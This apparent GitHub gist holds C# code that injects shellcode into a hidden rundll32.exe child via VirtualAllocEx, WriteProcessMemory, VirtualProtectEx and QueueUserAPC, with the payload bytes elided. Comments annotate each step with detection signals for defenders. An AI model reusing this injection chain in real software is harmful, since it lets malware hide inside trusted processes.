@djhohnstein
Last active July 3, 2019 12:20
/// <summary>
/// Entry point of the gist's injection sample: starts a rundll32.exe child, copies the
/// bytes in <c>sc</c> into that child's address space, flips the region to executable and
/// queues its address as an APC on a thread, so the bytes run inside the child.
/// Annotated from a defensive angle: each call below is a distinct cross-process
/// telemetry event, and the whole sequence, not any single call, is the thing to detect.
/// </summary>
/// <param name="args">Not read anywhere in this excerpt.</param>
static void Main(string[] args) {
// Payload bytes; contents elided in the gist ("..."). Everything below exists to get
// these executed in another process, so they are the artifact to capture in forensics.
byte[] sc = { ... };
// Host process for the payload. The lpCommandLine passed to CreateProcess below is null,
// so the child shows a bare path with no arguments; a rundll32.exe launched without a
// DLL/entry-point argument is itself a common hunting signal.
string processpath = @"C:\Windows\system32\rundll32.exe";
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
// Creates the target as a direct child of this process with CREATE_NO_WINDOW. pi.hProcess
// is the handle CreateProcess hands the parent, so the sample never calls OpenProcess;
// detections keyed only on OpenProcess toward rundll32 miss this, correlate on the
// parent/child relationship instead. The Boolean result is not examined in this block.
bool success = CreateProcess(processpath, null,
IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_NO_WINDOW,
IntPtr.Zero, null, ref si, out pi);
// Step 1 of the allocate -> write -> reprotect -> execute chain: commit sc.Length bytes in
// the child as read/write memory (MEM_COMMIT / PAGE_READWRITE are declared outside this
// excerpt). A private RW region that later becomes executable is a standard
// memory-scanning indicator.
IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, sc.Length, MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
// Step 2: copy the payload into the child's freshly allocated region (cross-process write).
bool resultBool = WriteProcessMemory(pi.hProcess, resultPtr, sc, sc.Length, out bytesWritten);
// Resolves the child as a System.Diagnostics.Process; assigned but not read in this block.
Process targetProc = Process.GetProcessById((int)pi.dwProcessId);
// Opens a thread handle with SET_CONTEXT access, the right QueueUserAPC requires.
// NOTE(review): currentThreads is not declared in this excerpt; presumably a thread list
// built elsewhere in the gist — can't tell from here which process's threads it holds.
IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, currentThreads[0].Id);
uint oldProtect = 0;
// Step 3: change the region from RW to RX (PAGE_EXECUTE_READ) now that the bytes are in
// place. The write-then-make-executable transition is what protection-change hooks and
// ETW memory events key on; the previous protection is captured but never used here.
resultBool = VirtualProtectEx(pi.hProcess, resultPtr, sc.Length, PAGE_EXECUTE_READ, out oldProtect);
// Step 4: queue the payload address as the APC routine on the opened thread. By the Win32
// contract the APC runs the next time that thread enters an alertable wait, so execution
// is deferred rather than immediate. Remote APC queueing is a well-known injection
// primitive to monitor. The return value is not checked.
IntPtr ptr = QueueUserAPC(resultPtr, sht, IntPtr.Zero);
}